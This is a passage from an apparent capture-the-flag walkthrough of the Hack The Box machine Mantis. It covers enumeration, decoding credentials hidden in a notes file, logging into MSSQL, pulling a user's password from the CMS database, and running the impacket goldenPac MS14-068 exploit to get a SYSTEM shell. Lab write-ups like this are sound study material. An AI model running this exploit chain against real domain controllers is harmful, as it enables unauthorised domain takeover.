| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-03-28T06:59:45
|_Not valid after:  2051-03-28T06:59:45
|_ssl-date: 2021-03-29T05:34:40+00:00; +6m52s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 41m09s, deviation: 1h30m44s, median: 6m51s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2021-03-29T01:34:31-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-03-29T05:34:28
|_  start_date: 2021-03-28T06:59:22

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 29 01:27:54 2021 -- 1 IP address (1 host up) scanned in 84.96 seconds

Something new just turned up port 1337 is running another http service, and for the first time I understand the meaning of enumerate harder!!

1337

Doing a fuzz to check for other directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

┌──(kali㉿kali)-[~/HackTheBox/mantis/recon]
└─$ gobuster dir -u http://mantis.htb.localmantis.htb.local:mantis.htb.local::1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://mantis.htb.local:1337
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/03/29 01:46:12 Starting gobuster in directory enumeration mode
===============================================================
/orchard              (Status: 500) [Size: 3026]
/secure_notes         (Status: 301) [Size: 159] [--> http://mantis.htb.local:1337/secure_notes/]
                                                                                          
===============================================================
2021/03/29 02:59:49 Finished
===============================================================

The secure notes page contained 2 files, the contents of the dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt file was.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.



Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

Finally something useful. Seems like I can get the creds for the CMS from here. 

1
2
3
4
5
6
7
8

In [11]: import binascii

In [12]: x = int('0b010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001',2)

In [13]: binascii.unhexlify('%x' % x)
Out[13]: b'@dm!n_P@ssW0rd!'

Login

I poked around the admin dashboard and searched for any RCE. Couldn’t find anything. Another Rabbit hole, most probably!

It was given the SQL server password is also there in the file, tried loging into the SQL server using the above password. It didn’t work.

Checking the secure notes file again gave me the clue. The file name has some encoded stuff present.

Decode

The decoded value is in hex, converting it to ASCII.

1
2
3
4
┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ echo '6d2424716c5f53405f504073735730726421' | xxd -r -p                                                   2 ⨯
m$$ql_S@_P@ssW0rd!

Yeah!! Got the mysql password!

Loggin in!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ mssqlclient.py 'sa:m$$ql_S@_P@ssW0rd!@10.10.10.52'                                                        2 ⨯
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'sa'.
                                                                                                                  
┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ mssqlclient.py 'root:m$$ql_S@_P@ssW0rd!@10.10.10.52'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed for user 'root'.
                                                                              
                                                                              
                 ┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ mssqlclient.py 'admin:m$$ql_S@_P@ssW0rd!@10.10.10.52'                                                     1 ⨯
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> EXEC xp_cmdshell 'whoami.exe';
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL> EXEC xp_cmdshell 'whoami';
[-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL>

Guess I won’t be able to execute any commands here. Maybe I will get info from the Db.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

SQL> SELECT name FROM master.dbo.sysdatabases
name                                                                                                                               

--------------------------------------------------------------------------------------------------------------------------------   

master                                                                                                                             

tempdb                                                                                                                             

model                                                                                                                              

msdb                                                                                                                               

orcharddb

MySQL skills are pretty bad. I will try out some GUI tool to check out the DB. Found a tool called DBeaver.

SQLserver

Found something useful in the orcharddb, Table blog_Orchard_Users_UserPartRecord

Creds

Now that I have a username and password kerberos might work. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ crackmapexec smb 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'                                                1 ⨯
/usr/lib/python3/dist-packages/impacket/smbserver.py:2464: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2500: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:2842: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if jtr_dump_path is not '':
/usr/lib/python3/dist-packages/impacket/smbserver.py:4416: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if credentials_fname is not "":
SMB         10.10.10.52     445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
                                                                                                                  
┌──(kali㉿kali)-[~/HackTheBox/mantis]

Okay that didn’t work. It’s pretty sure that we can use the james login to get the shell. The only question is how.

Exploit

Kerberos , from this article I got to know that the authentication in kerberos relies on tickets and there are cases where the system doesn’t verify these tickets which can lead to all sorts of bad things. One issue that we might face here is that the system checks for the timestamp.

There is a myth in the Windows Kerberos world that if a workstation’s clock is skewed more than 5 minutes from that of the Domain Controller, Kerberos authentication wouldn’t work.

Is this possible?

F-secure labs blog on MS14-068 suggested that using the Impacket goldenPac module the system can be exploited. The walkthrough of this exploit in other forms require a lot more effort, which includes fetching the SID, then moving on to the creation of the ticket.

One thing to make sure is the time. Using rdate to set the system’s date from the host. The args -4ns means using IPv4 addresses, using SNTP and s to set the time. 

1
2
3
4

┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ sudo rdate -4ns 10.10.10.52

Running the goldenPac with the creds of james.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

┌──(kali㉿kali)-[~/HackTheBox/mantis]
└─$ goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local                                            1 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file FLOoVAWU.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service ckTW on mantis.htb.local.....
[*] Starting service ckTW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Logged in as root, and that is how I owned mantis.

 Previous

AngstromCTF XSS CSRF Cookies